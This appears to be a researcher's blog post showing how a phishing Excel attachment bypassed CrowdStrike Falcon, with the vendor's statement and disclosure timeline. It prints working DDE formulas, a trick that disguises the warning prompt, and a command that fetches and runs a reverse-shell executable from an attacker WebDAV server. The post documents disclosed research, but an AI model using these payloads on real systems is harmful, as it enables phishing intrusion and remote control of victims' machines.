Update 2019/01/14: Crowdstrike asked me to share an official statement:

“We appreciate you reporting this detection miss to us and allowing us to rapidly address this gap on January 11th. We do have a bug bounty program www.hackerone.com/crowdstrike or via [email protected] that can be used by researchers to report any issues directly to us and get a monetary reward. We also would like to point out that while CrowdStrike Falcon did not originally show a UI detection for the establishment of the shell (it did record all the activity with the EDR part of the solution), we believe that follow-on adversary activity would have been easily picked up by the product. We love engaging with the researcher community to continue making Falcon the best endpoint security solution on the market - thank you for the feedback!”

Update 2019/01/22: I have confirmation that the two main competitors did not catch it either.

Crowdstrike Falcon is part of a new wave of endpoint security solutions that attempt to detect and block unusual activity using machine-learning and behavioral analysis (at least, that’s what the vendors say).

I can confirm that well known and used living off the land tactics (think Powershell, WScript, Bitsadmin, mshta, etc.) generally won’t be successful if Falcon is installed on the target. It will make a threat actor’s life a lot harder. It’s probably the same with other similar solutions such as Carbon Black, Cylance, etc.

When I say bypassing, I mean completely bypass detection, from the phishing email received by the user to the reverse shell. Something realistic, not just writing a malware and see if it gets executed.

So if we can’t use the classic techniques, about trying some new (old) trick?

Turns out, it was pretty trivial ¯\_(ツ)_/¯.

The setup

Attacker:

A cheap VPS (found on LowEndBox) with Apache 2 and mod_webdav enabled and configured

A Python reverse shell packaged as single binary with pyinstaller --onefile

Crafted Excel file

Target VM:

Windows 10 1803 with all the security fixes, up to date

Crowdstrike Falcon Sensor (latest version)

Excel 2016 fully patched, Outlook configured with my corporate mailbox

Step 1. The attachment

This time I decided to go with something less-known and a bit more tricky than a simple macro. I wanted to be sure it wouldn't be caught by the company's email filter and Windows Defender. I knew there was a chance that it would be caught by Falcon but I decided to try anyway.

So I decided to use a trick I had observed during the Hancitor campaign a while ago, which is leveraging the Dynamic Data Exchange (DDE) feature instead of a macro.

My first attempt was to use it by inserting a formula in a Word document (CTRL+F9) in which I’d simply have to insert the following line:

{DDEAUTO c:\\windows\\system32\\cmd.exe "/k notepad.exe"}

Unfortunately, Notepad didn’t launch. After a quick search, I saw that Microsoft had shipped a patch in December 2017 that disabled the feature in Word.

So if it’s disabled in Word… what about Excel?

Second try, inserting a formula in Excel:

=cmd|'/c notepad.exe'!_xlbgnm.A1

It worked!

To make things more credible to the user, it’s possible to manipulate the message displayed in the warning box for the user.

Originally, the message displayed is the following:



However, it’s possible to replace the CMD.EXE with EXCEL.EXE to make things more credible using:

=EXCEL|'\..\..\..\Windows\System32\cmd.exe /c notepad.exe'!_xlbgnm.A1

Now, that’s seem a bit more legit:



So I had a way to execute code through an attachment, assuming the user would click Yes to the warning message without reading. Now, about using this to download and execute the payload?

Step 2. WebDAV

Why WebDAV? Assuming all the popular, living off the land tactics, wouldn't work and I would get caught, I started to think about a different way of doing things. Then, I remembered that Windows can connect and browse WebDAV servers using Explorer. Can you see what I'm getting at?

I set up a small VPS with Apache and the mod_webdav module. Then, I changed ports.conf to free port 443, which I used to listen on with Netcat.

Step 3. Executing a reverse shell

Making a reverse shell was easy. All I had to do is use some Python reverse shell code that works on Windows. There are plenty laying around on GitHub or pentesting blogs. Why Python? It was less likely to be detected. Then, on a Windows machine, I created a standalone executable using PyInstaller with the `pyinstaller --onefile run.py` command.

Once the shell was ready, I uploaded it to the root of the WebDAV folder.

Now I had to see if it could be executed through WebDAV. On the victim VM:

=cmd|'/c cmd.exe /c "\\167.160.187.142\\webdav\run.exe"'!_xlbgnm.A1

Not working. Why? I run the command in the command prompt and I see:

The specified path does not exist. Check the path, and then try again.

Yet the payload was there. So after a bit of Google search I found this article on TechNet and figured all I had to do was rename the file to run.txt , copy the file on the machine (it’s a network location after all!) and execute it locally. It worked.

=cmd|'/c cmd.exe /c "copy \\167.160.187.142\webdav\run.txt c:\users\public\run.exe" && cmd.exe /c "c:\users\public\run.exe"'!_xlbgnm.A1

Step 4. Putting the pieces together

Crowdstrike Falcon uses behavioral analysis to detect malicious Office documents that try to execute code. For example, if the process execution tree is the following:

explorer.exe > outlook.exe > excel.exe > powershell.exe -windowstyle hidden -executionpolicy bypass -enc

Is it because of the execution flow or simply because of the Powershell arguments? That’s unclear.

That said, the following worked:

Created an email from a junk mailbox and attached the “malicious” Excel file to it.

Sent the email to a corporate mailbox

Open the email from the corporate mailbox in Outlook, open the attachment, click “Yes” on the warning popup.

Wait

Get a shell on the machine.

Wait! What? It worked? Something must be wrong. I then make sure the Falcon service is running. It is. I go check the host in the Falcon dashboard see if it still is communicating, it is. So I try again. Yup, still works.

What Falcon saw and the reverse shell:

(sorry for the potato screenshots, had to stich them together as new users can only post 1 image)

While not a vulnerability, I decided to wait before writing this post and reported the bypass technique to Crowdstrike on December 21st 2018 so it’s not being abused by any bad actors (although they might have found it on their own). Crowdstrike confirmed that the bypass was valid and patched it on January 11th 2019.

If any of you can test with Carbon Black and other similar products, please let me know the results!

Edit 2019/01/14:

Added an explanation on how to manipulate the warning message box to replace CMD.EXE with EXCEL.EXE

Added Crowdstrike official statement

Edit 2019/01/22: